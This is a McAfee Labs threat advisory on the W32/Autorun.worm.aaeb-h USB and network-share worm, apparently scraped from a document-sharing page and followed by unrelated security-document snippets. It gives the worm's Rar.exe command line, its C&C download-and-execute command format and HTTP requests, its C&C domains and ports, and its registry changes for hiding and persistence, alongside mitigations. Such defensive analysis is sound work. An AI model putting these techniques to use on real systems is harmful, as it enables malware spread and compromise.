McAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h
|
|
- Rosalind McLaughlin
- 8 years ago
- Views:
Transcription
1 Summary McAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h August 9, 2013 W32/Autorun.worm.aaeb-h has the ability to infect removable media devices, as well as mounted network shares. Infection starts either with manual execution of the infected file or by simply navigating to the folders that contain the infected files, whereby the Autorun.inf file could cause automatic execution of the malware. It could also add copies of itself in.zip and.rar archive files. It will also download other malwares or updates to itself directed by the C&C server. Detailed information about the worm, its propagation, and mitigation are in the following sections: Infection and Propagation Vectors Characteristics and Symptoms Restart Mechanism Getting Help from the McAfee Foundstone Services team Infection and Propagation Vectors W32/Autorun.worm.aaeb-h spreads by creating copies of itself in removable storage devices and mounted network shares. It will also create an autorun.inf to allow it to automatically execute itself when attached to another system with autorun enabled. It changes the attributes of the directories in the affected drive to hidden and creates copies of itself with the same filename as the hidden directory. It checks files with the following extensions in the removable drives, changes its attributes to hidden, and creates copies of itself with the same filename as the hidden file: mp3 avi wma wmv wav mpg mp4 doc txt pdf xls jpg jpe bmp gif tif png It makes sure that the hidden files will remain hidden in Explorer by setting the ShowSuperHidden registry value to 0: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden = dword:
2 It creates copies of itself with the following filenames: Secret.exe Sexy.exe Porn.exe Passwords. Exe Runme.exe *gy.exe..exe.exe Users may then unknowingly open the malware files. It will drop the following 0 byte file in the removable device: x.mpeg It will add a copy of itself in.zip and.rar files found on the system. It will check for Winrar on the system and use the rar.exe command line tool to add a copy of itself on the.zip or.rar file found. Execute Rar.exe with the following command line: Rar.exe a -y -ep -IBCK "<rar/zip file found>" "%userprofile%\secret.exe" The added malware copy in the affected archive has the filename Secret.exe. Mitigation Disable the Autorun feature on Windows. You can do this remotely using Windows Group Policies. Restrict the use of USB drives in mission-critical and server machines. Create an access protection rule to prevent modification of the ShowSuperHidden registry key listed above. Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing of AUTORUN.INF files. Characteristics and Symptoms Description Upon execution it creates a copy of itself to the following path: %UserProfile%\[random].exe Note: %UserProfile% refers to the current user s profile folder. It changes several bytes in the newly created file in an attempt to avoid anti-virus detection. It then connects to a command and control server to receive commands. Upon connection, the server automatically sends out the command. Currently the command sent is to download and execute files from the URL given. Command structure observed: :.dl [URL] [filename] Example command sent by the C&C server: :.dl 6 numbers>.zdns.eu:443/qjvdpnruwp?f google.com :.dl 7 numbers>.kimsufi.com New variants observed have an encrypted communication with the server.
3 When the malware receives the above command, it will attempt to download and then execute the downloaded file. The payload files that were observed so far are mostly Zbot and BackDoor families. This is frequently updated in the server. Http GET request sent out by the malware when downloading the malicious file pointed by the server: Host: <random 5-digit number>.noip1.de:443 Host: <random 5-digit number>.noip1.nl:443 Host: <random 5-digit number>.zdns.eu GET /2/?<randomletter> [USERNAME] HTTP/1.1 Host: <random 5-digit number>.noip1.at GET /0/?<randomletter> [USERNAME] HTTP/1.1 Host: <random 5-digit number>.noip1.at GET /uyvsutnie?f HTTP/1.1 Host: noip.at Note: The URL where it downloads for updates or additional malware will vary depending on the C&C. The following are the observed domains of the C&C servers: Ns1.helpupdater.net ns1.helpupdater.net ns1.helpchecks.net ns1.helpupdated.com ns1.helpupdated.net ns1.helpupdated.org ns1.helpupdatek.at ns1.helpupdatek.eu ns1.helpupdatek.tw ns1.helpupdater.net ns1.helpupdates.com ns1.helpupdated.co ns1.helpupdated.ne ns1.helpupdated.or ns1.helpupdatek.a ns1.helpupdatek.e ns1.thepicturehut.net ns1.player1253.com ns1.videoall.net ns1.mediashares.org ns1.helpchecks.net ns1.couchness.com ns1.chopbell.net ns1.chopbell.com ns1.helpupdated.net ns1.helpupdated.org ns1.helpupdatek.at ns1.helpupdatek.eu
4 ns1.helpupdatek.tw existing.suroot.com dtdns.net ns1.helpchecks.com ns1.cpuchecks.com ns1.timedate1.com ns1.timedate1.net ns1.timedate1.org ns1.timedate2.com ns1.timedate2.net ns1.timedate2.org ns1.timedate3.com ns1.timedate3.net ns1.timedate3.org ns1.boxonline1.com ns1.boxonline1.net ns1.boxonline1.org ns1.boxonline2.com ns1.boxonline2.net ns1.boxonline2.org ns1.boxonline3.com ns1.boxonline3.net ns1.boxonline3.org The following are the observed C&C server TCP ports where the malware connected to: port 8002 port 8000 port 443 port 80 port 3128 port port 9004 port 9904 port 7005 The malware also randomly uses domain suffixes with the following strings:.com.net.org.biz.info.at.eu.by This malware will disable the Windows update by setting the NoAutoUpdate registry value to 1: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU NoAutoUpdate = dword: This malware will also prevent any process that contains the strings proc and task in its filename from terminating the malware process by patching the RET instruction onto the first instruction of TerminateThread and TerminateProcess functions. Mitigation Users are requested to exercise caution while opening unsolicited s and unknown files. Users are advised to update Windows and third-party application security patches and virus definitions on a regular basis and have proper filtering rules: If possible, block access to the ports and monitor and block mentioned URLs. If possible, block access to any HTTP request having the exact user-agent string as Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) Create an access protection rule to restrict file dropping to the aforementioned folder.
5 Create an access protection rule to prevent file execution from the %UserProfile% folder. Create an access protection rule to prevent modification to the NoAutoUpdate registry key listed above. Access Protection must be ON and proper rules must be set to get to know which process is actually responsible for changing the attributes of files and folders. Restart Mechanism Description The following registry entry would enable the trojan to execute every time when Windows starts: <malware name> = %UserProfile%\<Random name>.exe /e" <malware name> = %UserProfile%\<Random name>.exe /c" <malware name> = %UserProfile%\<Random name>.exe /h" <malware name> = %UserProfile%\<Random name>.exe /p" Getting Help from the McAfee Foundstone Services team This document is intended to provide a summary of current intelligence and best practices to ensure the highest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers a full range of strategic and technical consulting services that can further help to ensure you identify security risk and build effective solutions to remediate security vulnerabilities. You can reach them here: McAfee, Inc. All rights reserved.
Test Case - Privatefirewall 5.0, Intrusion and Malware Defense
Test Case - Privatefirewall 5.0, Intrusion and Malware Defense Objective and Methodology: Privatefirewall is a desktop defense application comprised of several distinct technology layers designed to block
More informationTechnical Note. CounterACT: Powerful, Automated Network Protection Inside and Out
CounterACT: Powerful, Contents Introduction...3 Automated Threat Protection against Conficker... 3 How the Conficker Worm Works.... 3 How to Use CounterACT to Protect vs. the Conficker Worm...4 1. Use
More informationDetailed information about the Trojan, its propagation, and mitigation are in the following sections:
Summary McAfee Labs Threat Advisory BackDoor-FJW May 10, 2013 BackDoor-FJW is detection for Trojan that receives commands from an attacker to access the infected machine and to download other payloads.
More informationOperation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More information1. At the bottom right hand side of the Home page, click the Get Started link under Tour Guide for help navigating the site.
This training guide will provide an overview of the 1080 emoney Portal. The 1080 emoney Portal is a Personal Financial Website that will provide you with a consolidated view of your financial information.
More informationThis report is a detailed analysis of the dropper and the payload of the HIMAN malware.
PAGE 5 Check Point Malware Research Group HIMAN Malware Analysis December 12, 2013 Researcher: Overview This report is a detailed analysis of the dropper and the payload of the HIMAN malware. This malware
More informationManaging a Malware Outbreak
Sality A Case Study Authors: Mike Andrews Senior Principal Consultant Jerry Pierce Principal Consultant Shawn Baker Senior Consultant Table of Contents Managing a Malware Outbreak... 1 Sality A Case Study...
More informationMcAfee Avert Labs Finding W32/Conficker.worm
McAfee Avert Labs Finding W32/Conficker.worm By Kevin Gudgion, Avert Labs Services Contents Overview... 2 Symptoms... 2 Characteristics... 2 Fighting W32/Conficker.worm... 5 Finding W32/Conficker.worm...
More informationCloud Services Prevent Zero-day and Targeted Attacks
Cloud Services Prevent Zero-day and Targeted Attacks WOULD YOU OPEN THIS ATTACHMENT? 2 TARGETED ATTACKS BEGIN WITH ZERO-DAY EXPLOITS Duqu Worm Causing Collateral Damage in a Silent Cyber-War Worm exploiting
More informationRelease Notes for Websense Email Security v7.2
Release Notes for Websense Email Security v7.2 Websense Email Security version 7.2 is a feature release that includes support for Windows Server 2008 as well as support for Microsoft SQL Server 2008. Version
More informationVISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation
VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE Distribution: Merchants, Acquirers Who should read this: Information security, incident response, cyber intelligence staff Summary Kuhook
More informationComputer Viruses: How to Avoid Infection
Viruses From viruses to worms to Trojan Horses, the catchall term virus describes a threat that's been around almost as long as computers. These rogue programs exist for the simple reason to cause you
More informationComparison of Firewall, Intrusion Prevention and Antivirus Technologies
White Paper Comparison of Firewall, Intrusion Prevention and Antivirus Technologies How each protects the network Juan Pablo Pereira Technical Marketing Manager Juniper Networks, Inc. 1194 North Mathilda
More informationMcAfee Labs Combating Fake Alert infections. - Amith Prakash, Global Threat Response
McAfee Labs Combating Fake Alert infections - Amith Prakash, Global Threat Response 1 What are FakeAlerts?... 2 Symptoms... 2 Characteristics- CLASSICAL EXAMPLE OF SOCIAL ENGINEERING... 3 Warnings displayed
More informationTrend Micro OfficeScan 11.0. Best Practice Guide for Malware
Trend Micro OfficeScan 11.0 Best Practice Guide for Malware Information in this document is subject to change without notice. The names of companies, products, people, characters, and/or data mentioned
More informationNetwork Incident Report
To submit copies of this form via facsimile, please FAX to 202-406-9233. Network Incident Report United States Secret Service Financial Crimes Division Electronic Crimes Branch Telephone: 202-406-5850
More informationMalware Trend Report, Q2 2014 April May June
Malware Trend Report, Q2 2014 April May June 5 August 2014 Copyright RedSocks B.V. 2014. All Rights Reserved. Table of Contents 1. Introduction... 3 2. Overview... 4 2.1. Collecting Malware... 5 2.2. Processing...
More informationDesktop Release Notes. Desktop Release Notes 5.2.1
Desktop Release Notes Desktop Release Notes 5.2.1 COPYRIGHT Copyright 2011 McAfee, Inc. All Rights Reserved. No part of this publication may be reproduced, transmitted, transcribed, stored in a retrieval
More informationBest Practice Configurations for OfficeScan (OSCE) 10.6
Best Practice Configurations for OfficeScan (OSCE) 10.6 Applying Latest Patch(es) for OSCE 10.6 To find out the latest patches for OfficeScan, click here. Enable Smart Clients 1. Ensure that Officescan
More informationANTIVIRUS BEST PRACTICES
ANTIVIRUS BEST PRACTICES Antivirus Best Practices 1. Introduction This guideline covers the basics on Antivirus Software and its best practices. It will help to have an overall understanding of the subject
More informationGFI Product Manual. Administration and Configuration Manual
GFI Product Manual Administration and Configuration Manual http://www.gfi.com info@gfi.com The information and content in this document is provided for informational purposes only and is provided "as is"
More informationRecommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
More informationMalware Protection II White Paper Windows 7
Malware Protection II White Paper Windows 7 Rohde & Schwarz recognizes the potential risk of computer virus infection when connecting Windows -based test instrumentation to other computers via local area
More informationSophos for Microsoft SharePoint Help
Sophos for Microsoft SharePoint Help Product version: 2.0 Document date: March 2011 Contents 1 About Sophos for Microsoft SharePoint...3 2 Dashboard...4 3 Configuration...5 4 Reports...27 5 Search...28
More informationSophos Enterprise Console Help. Product version: 5.1 Document date: June 2012
Sophos Enterprise Console Help Product version: 5.1 Document date: June 2012 Contents 1 About Enterprise Console...3 2 Guide to the Enterprise Console interface...4 3 Getting started with Sophos Enterprise
More informationVESZPROG ANTI-MALWARE TEST BATTERY
VESZPROG ANTI-MALWARE TEST BATTERY 2012 The number of threats increased in large measure in the last few years. A set of unique anti-malware testing procedures have been developed under the aegis of CheckVir
More informationSecurity A to Z the most important terms
Security A to Z the most important terms Part 1: A to D UNDERSTAND THE OFFICIAL TERMINOLOGY. This is F-Secure Labs. Learn more about the most important security terms with our official explanations from
More informationOverview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms
Overview Common Internet Threats Tom Chothia Computer Security, Lecture 19 Phishing Sites Trojans, Worms, Viruses, Drive-bydownloads Net Fast Flux Domain Flux Infiltration of a Net Underground economy.
More informationNetwork Security. Demo: Web browser
Network Security Demo: Web browser Email Messages An email message can be instantly forwarded around the globe, even if accidentally. Do not write anything in a message that you will later regret! Read
More informationBest Practices for Deploying Behavior Monitoring and Device Control
Best Practices for Deploying Behavior Monitoring and Device Control 1 Contents Overview... 3 Behavior Monitoring Overview... 3 Malware Behavior Blocking... 3 Event Monitoring... 4 Enabling Behavior Monitoring...
More informationSystem Compatibility. Enhancements. Operating Systems. Hardware Requirements. Email Security
Email Security SonicWALL Email Security 7.0 for Microsoft Small Business Server System Compatibility SonicWALL Email Security 7.0 Software is supported on systems with the following: Operating Systems
More informationBeware! CryptoLocker Ransomware
Beware! CryptoLocker Ransomware 1 Ransomware Malicious software (malware) that infects a computer and restricts access to the computer and/or its files Demands a ransom to be paid in order for the restriction
More informationAccess Protection in McAfee VirusScan Enterprise and Host Intrusion Prevention
Access Protection in McAfee VirusScan Enterprise and Host Intrusion Prevention Public release edition Ben Andrew MCSE Senior Product Manager Access Protection in VirusScan Enterprise 3 Extending Access
More information05 June 2015 A-000061-MW TLP: GREEN
05 June 2015 Alert Number A-000061-MW Please contact the FBI with any questions related to this FLASH Report at either your local Cyber Task Force or FBI CYWATCH. Email: cywatch@ic.fbi.gov Phone: 1-855-292-3937
More informationOnline Security Awareness - UAE Exchange - Foreign Exchange Send Money UAE Exchange
The responsibility of safeguarding your personal information starts with you. Your information is critical and it must be protected from unauthorised disclosure, modification or destruction. Here we are
More informationWildFire Overview. WildFire Administrator s Guide 1. Copyright 2007-2015 Palo Alto Networks
WildFire Overview WildFire provides detection and prevention of zero-day malware using a combination of malware sandboxing and signature-based detection and blocking of malware. WildFire extends the capabilities
More informationBotnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic
The Leader in Cloud Security RESEARCH REPORT Botnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic ABSTRACT Zscaler is a cloud-computing,
More informationTrend Micro Healthcare Compliance Solutions
How Trend Micro s innovative security solutions help healthcare organizations address risk and compliance challenges WHITE Worry-Free Business Security Fast, effective, and simple protection against viruses
More informationAntivirus Solution Guide for Clustered Data ONTAP 8.2.1: McAfee
Technical Report Antivirus Solution Guide for Clustered Data ONTAP 8.2.1: McAfee Saurabh Singh and Brahmanna Chowdary Kodavali, NetApp June 2015 TR-4286 Abstract An antivirus solution is key for enterprises
More informationRadware Security Research. Reverse Engineering a Sophisticated DDoS Attack Bot. Author: Zeev Ravid
Reverse Engineering a Sophisticated DDoS Attack Bot Author: Zeev Ravid July 2015 Introduction In July 2015, Radware s Emergency Response Team (ERT) noticed a significant increased usage of the Tsunami
More informationMalware Protection White Paper
Malware Protection White Paper Rohde & Schwarz recognizes the potential risk of computer virus infection when connecting Windows -based test instrumentation to other computers via local area networks (LANs),
More informationRelease Notes for McAfee epolicy Orchestrator 4.5
Release Notes for McAfee epolicy Orchestrator 4.5 About this document New features Known Issues Installation, upgrade, and migration considerations Considerations when uninstalling epolicy Orchestrator
More informationIntegrated Approach to Network Security. Lee Klarich Senior Vice President, Product Management March 2013
Integrated Approach to Network Security Lee Klarich Senior Vice President, Product Management March 2013 Real data from actual networks 2 2012, Palo Alto Networks. Confidential and Proprietary. 2008: HTTP,
More informationCTERA Agent for Linux
User Guide CTERA Agent for Linux September 2013 Version 4.0 Copyright 2009-2013 CTERA Networks Ltd. All rights reserved. No part of this document may be reproduced in any form or by any means without written
More informationAgilent Technologies Electronic Measurements Group Computer Virus Control Program
Agilent Technologies Electronic Measurements Group Computer Virus Control Program Agilent Technologies Electronic Measurements Group (EMG) recognizes the potential risk of computer virus infection that
More informationOwner of the content within this article is www.isaserver.org Written by Marc Grote www.it-training-grote.de
Owner of the content within this article is www.isaserver.org Written by Marc Grote www.it-training-grote.de Configuring the Forefront TMG HTTP Filter Abstract In this article I will show you how to configure
More informationMicrosoft Software Update Services and Managed Symantec Anti-virus. Michael Satut TSS/Crown IT Support m-satut@northwestern.edu
Microsoft Software Update Services and Managed Symantec Anti-virus Michael Satut TSS/Crown IT Support m-satut@northwestern.edu Introduction The recent increase in virus and worm activity has created the
More informationGFI White Paper PCI-DSS compliance and GFI Software products
White Paper PCI-DSS compliance and Software products The Payment Card Industry Data Standard () compliance is a set of specific security standards developed by the payment brands* to help promote the adoption
More informationSophos Enterprise Console Help
Sophos Enterprise Console Help Product version: 5.2.1, 5.2.2 Document date: September 2014 Contents 1 About Enterprise Console...6 2 Guide to the Enterprise Console interface...7 2.1 User interface layout...7
More informationSophos for Microsoft SharePoint Help. Product version: 2.0
Sophos for Microsoft SharePoint Help Product version: 2.0 Document date: September 2015 Contents 1 About Sophos for Microsoft SharePoint...3 2 Dashboard...4 3 Configuration...5 3.1 On-access scan...5 3.2
More informationContext Threat Intelligence
Context Threat Intelligence Threat Advisory The Monju Incident Context Ref. Author TA10009 Context Threat Intelligence (CTI) Date 27/01/2014 Tel +44 (0) 20 7537 7515 Fax +44 (0) 20 7537 1071 Email threat@contextis.co.uk
More information1 Introduction. Agenda Item: 7.23. Work Item:
3GPP TSG SA WG3 Security S3#34 S3-040583 6-9 Jul 2004 updated S3-040566 Acapulco, Mexico Title: Selective Disabling of UE Capabilities; updated S3-040566 based on the comments on SA3 mailing list Source:
More informationEnterprise Incident Response: Network Intrusion Case Studies and Countermeasures
Enterprise Incident Response: Network Intrusion Case Studies and Countermeasures Eric J. Eifert Vice President, Cyber Defense Division ManTech s Mission, Cyber, & Technology Solutions Presentation Overview
More informationMcAfee One Time Password
McAfee One Time Password Integration Module Outlook Web App 2010 Module version: 1.3.1 Document revision: 1.3.1 Date: Feb 12, 2014 Table of Contents Integration Module Overview... 3 Prerequisites and System
More informationITSC Training Courses Student IT Competence Programme SIIS1 Information Security
ITSC Training Courses Student IT Competence Programme SI1 2012 2013 Prof. Chan Yuen Yan, Rosanna Department of Engineering The Chinese University of Hong Kong SI1-1 Course Outline What you should know
More informationMalware Analysis Quiz 6
Malware Analysis Quiz 6 1. Are these files packed? If so, which packer? The file is not packed, as running the command strings shelll reveals a number of interesting character sequences, such as: irc.ircnet.net
More informationCourse overview. CompTIA A+ Certification (Exam 220 902) Official Study Guide (G188eng verdraft)
Overview This 5-day course is intended for those wishing to qualify with. A+ is a foundation-level certification designed for IT professionals with around 1 year's experience whose job role is focused
More informationIntegrated Protection for Systems. João Batista Joao_batista@mcafee.com Territory Manager
Integrated Protection for Systems João Batista Joao_batista@mcafee.com Territory Manager 2 McAfee Overview Proven Expertise And what it means to you Proof of Expertise Impact of Expertise 1 17 100 300
More informationSpam, Spyware, Malware and You! Don't give up just yet! Presented by: Mervin Istace Provincial Library Saskatchewan Learning
Spam, Spyware, Malware and You! Don't give up just yet! Presented by: Mervin Istace Provincial Library Saskatchewan Learning Lee Zelyck Network Administrator Regina Public Library Malware, Spyware, Trojans
More information1. Digital Asset Management User Guide... 2 1.1 Digital Asset Management Concepts... 2 1.2 Working with digital assets... 4 1.2.1 Importing assets in
1. Digital Asset Management User Guide....................................................... 2 1.1 Digital Asset Management Concepts.................................................... 2 1.2 Working with
More informationEmail David-Kovarik@northwestern.edu Phone 847-467-5930 Fax 847-467-6000
Information Technology Information and Systems Security/Compliance Northwestern University 1800 Sherman Av Suite 209 Evanston, IL 60201 Email David-Kovarik@northwestern.edu Phone 847-467-5930 Fax 847-467-6000
More informationThe Microsoft JPEG Vulnerability and the Six New Content Security Requirements
The Microsoft JPEG Vulnerability and the Six New Content Security Requirements Table of Contents OVERVIEW...3 1. THE VULNERABILITY DESCRIPTION...3 2. NEEDED: A NEW PARADIGM IN CONTENT SECURITY...4 3. PRACTICAL
More informationContact details For contacting ENISA or for general enquiries on information security awareness matters, please use the following details:
Malicious software About ENISA The European Network and Information Security Agency (ENISA) is an EU agency created to advance the functioning of the internal market. ENISA is a centre of excellence for
More informationSophos Anti-Virus standalone startup guide. For Windows and Mac OS X
Sophos Anti-Virus standalone startup guide For Windows and Mac OS X Document date: June 2007 Contents 1 What you need for installation...4 2 Installing Sophos Anti-Virus for Windows...5 3 Installing Sophos
More informationWhat are Viruses, Trojans, Worms & Spyware:
What are Viruses, Trojans, Worms & Spyware: There are many different types of computer viruses circulating in the cyber world, including regular Computer Viruses, Worms, Trojans, and Spyware. Each is different
More informationTechnology Blueprint. Protect Your Email Servers. Guard the data and availability that enable business-critical communications
Technology Blueprint Protect Your Email Servers Guard the data and availability that enable business-critical communications LEVEL 1 2 3 4 5 SECURITY CONNECTED REFERENCE ARCHITECTURE LEVEL 1 2 4 5 3 Security
More informationOptimizing Windows Security Features to Block Malware and Hack Tools on USB Storage Devices
350 PIERS Proceedings, Cambridge, USA, July 5 8, 2010 Optimizing Windows Security Features to Block Malware and Hack Tools on USB Storage Devices Dung Vu Pham 1, Malka N. Halgamuge 2, Ali Syed 1, and Priyan
More informationStep-by-Step Guide to Securing Windows XP Professional with Service Pack 2 in Small and Medium Businesses
Step-by-Step Guide to Securing Windows XP Professional with Service Pack 2 in Small and Medium Businesses 2004 Microsoft Corporation. All rights reserved. This document is for informational purposes only.
More informationUncover security risks on your enterprise network
Uncover security risks on your enterprise network Sign up for Check Point s on-site Security Checkup. About this presentation: The key message of this presentation is that organizations should sign up
More informationConficker by the numbers
Conficker by the numbers Sebastián Bortnik Security Analyst at ESET Latin America This is a translation for ESET LLC of a document previously available in Spanish by ESET Latin America (see http://eset-la.com/centro-amenazas/2241-conficker-numeros).
More informationSophos Anti-Virus for NetApp Storage Systems startup guide
Sophos Anti-Virus for NetApp Storage Systems startup guide Runs on Windows 2000 and later Product version: 1 Document date: April 2012 Contents 1 About this guide...3 2 About Sophos Anti-Virus for NetApp
More informationCloud Services Prevent Zero-day and Targeted Attacks Tom De Belie Security Engineer. [Restricted] ONLY for designated groups and individuals
Cloud Services Prevent Zero-day and Targeted Attacks Tom De Belie Security Engineer Facts 2 3 WOULD YOU OPEN THIS ATTACHMENT? 4 TARGETED ATTACKS BEGIN WITH ZERO-DAY EXPLOITS 5 Check Point Multi-Layered
More informationRSA Security Anatomy of an Attack Lessons learned
RSA Security Anatomy of an Attack Lessons learned Malcolm Dundas Account Executive John Hurley Senior Technology Consultant 1 Agenda Advanced Enterprise/ Threats The RSA Breach A chronology of the attack
More informationComputer Security DD2395
Computer Security DD2395 http://www.csc.kth.se/utbildning/kth/kurser/dd2395/dasakh11/ Fall 2011 Sonja Buchegger buc@kth.se Lecture 7 Malicious Software DD2395 Sonja Buchegger 1 Course Admin Lab 2: - prepare
More informationWEBTHREATS. Constantly Evolving Web Threats Require Revolutionary Security. Securing Your Web World
Securing Your Web World WEBTHREATS Constantly Evolving Web Threats Require Revolutionary Security ANTI-SPYWARE ANTI-SPAM WEB REPUTATION ANTI-PHISHING WEB FILTERING Web Threats Are Serious Business Your
More informationUsing Tofino to control the spread of Stuxnet Malware
technical datasheet Application Note Using Tofino to control the spread of Stuxnet Malware This application note describes how to use the Tofino Industrial Security Solution to prevent the spread of the
More informationAdministration Guide. WatchDox Server. Version 4.8.0
Administration Guide WatchDox Server Version 4.8.0 Published: 2015-11-01 SWD-20151101091846278 Contents Introduction... 7 Getting started... 11 Signing in to WatchDox... 11 Signing in with username and
More informationMcAfee MOVE / VMware Collaboration Best Practices
McAfee MOVE / VMware Collaboration Best Practices Christie J. Karrels Sales Engineer Federal DoD January 11, 2013 1 P a g e Contents Introduction... 3 Traditional Anti-Malware vs. Optimized Anti-Malware...
More informationInnovations in Network Security
Innovations in Network Security Michael Singer April 18, 2012 AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual Property and/or AT&T affiliated companies.
More information場 次 :C-3 公 司 名 稱 :RSA, The Security Division of EMC 主 題 : 如 何 應 用 網 路 封 包 分 析 對 付 資 安 威 脅 主 講 人 :Jerry.Huang@rsa.com Sr. Technology Consultant GCR
場 次 :C-3 公 司 名 稱 :RSA, The Security Division of EMC 主 題 : 如 何 應 用 網 路 封 包 分 析 對 付 資 安 威 脅 主 講 人 :Jerry.Huang@rsa.com Sr. Technology Consultant GCR Minimum Requirements of Security Management and Compliance
More informationms-help://ms.technet.2005mar.1033/security/tnoffline/security/smbiz/winxp/fwgrppol...
Page 1 of 16 Security How to Configure Windows Firewall in a Small Business Environment using Group Policy Introduction This document explains how to configure the features of Windows Firewall on computers
More informationWildFire Reporting. WildFire Administrator s Guide 55. Copyright 2007-2015 Palo Alto Networks
WildFire Reporting When malware is discovered on your network, it is important to take quick action to prevent spread of the malware to other systems. To ensure immediate alerts to malware discovered on
More informationDecryption. Palo Alto Networks. PAN-OS Administrator s Guide Version 6.0. Copyright 2007-2015 Palo Alto Networks
Decryption Palo Alto Networks PAN-OS Administrator s Guide Version 6.0 Contact Information Corporate Headquarters: Palo Alto Networks 4401 Great America Parkway Santa Clara, CA 95054 www.paloaltonetworks.com/company/contact-us
More informationSecurity+ Guide to Network Security Fundamentals, Third Edition. Chapter 2 Systems Threats and Risks
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 2 Systems Threats and Risks Objectives Describe the different types of software-based attacks List types of hardware attacks Define
More informationAttacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
More informationWindows Operating Systems. Basic Security
Windows Operating Systems Basic Security Objectives Explain Windows Operating System (OS) common configurations Recognize OS related threats Apply major steps in securing the OS Windows Operating System
More informationComprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware
More informationProduct Guide. McAfee Endpoint Security for Mac Threat Prevention 10.1.0
Product Guide McAfee Endpoint Security for Mac Threat Prevention 10.1.0 COPYRIGHT Copyright 2015 McAfee, Inc., 2821 Mission College Boulevard, Santa Clara, CA 95054, 1.888.847.8766, www.intelsecurity.com
More informationBlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note
BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise
More informationUnderstanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them
Lab Exercises Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Review Questions 1) In class, we made the distinction between a front-door attack and
More informationNet Protector Admin Console
Net Protector Admin Console USER MANUAL www.indiaantivirus.com -1. Introduction Admin Console is a Centralized Anti-Virus Control and Management. It helps the administrators of small and large office networks
More informationHow to Configure Symantec Protection Engine for Network Attached Storage for the Oracle ZFS Storage Appliance
An Oracle Technical White Paper January 2014 How to Configure Symantec Protection Engine for Network Attached Storage for the Oracle ZFS Storage Appliance Table of Contents Introduction... 3 How VSCAN
More informationE-mail Best Practices
CMSGu2012-06 Mauritian Computer Emergency Response Team CERT-MU SECURITY GUIDELINE 2011-02 Enhancing Cyber Security in Mauritius E-mail Best Practices National Computer Board Mauritius Version 1.0 June
More informationEnterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006
Enterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006 April 2013 Hologic and the Hologic Logo are trademarks or registered trademarks of Hologic, Inc. Microsoft, Active Directory,
More informationSophos for Microsoft SharePoint startup guide
Sophos for Microsoft SharePoint startup guide Product version: 2.0 Document date: March 2011 Contents 1 About this guide...3 2 About Sophos for Microsoft SharePoint...3 3 System requirements...3 4 Planning
More informationhttp://docs.trendmicro.com/en-us/smb/hosted-email-security.aspx
Trend Micro Incorporated reserves the right to make changes to this document and to the product described herein without notice. Before installing and using the product, review the readme files, release
More informationHost Checker. Configuration Guide
Host Checker Configuration Guide Overview... 2 Client Side requirements for Host Checker:... 2 Qualified platforms:... 2 Compatible platforms:... 2 Windows clients... 3 Installer Package Files and File
More information